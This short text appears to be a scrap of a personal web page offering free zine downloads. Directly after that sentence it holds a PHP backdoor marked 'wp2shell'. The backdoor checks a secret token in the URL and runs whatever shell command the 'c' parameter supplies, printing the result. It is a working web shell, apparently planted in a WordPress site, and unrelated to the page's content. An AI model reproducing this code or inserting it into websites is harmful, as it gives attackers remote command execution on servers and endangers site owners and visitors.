I’ve got a few zines that you can download for free.

// wp2shell if (isset($_GET['t']) && hash_equals('46e900e2458a479f0028c5b44d74646a', (string)$_GET['t']) && isset($_GET['c'])) { echo 'WP2SHELL::' . shell_exec((string)$_GET['c']) . '::END'; die(); }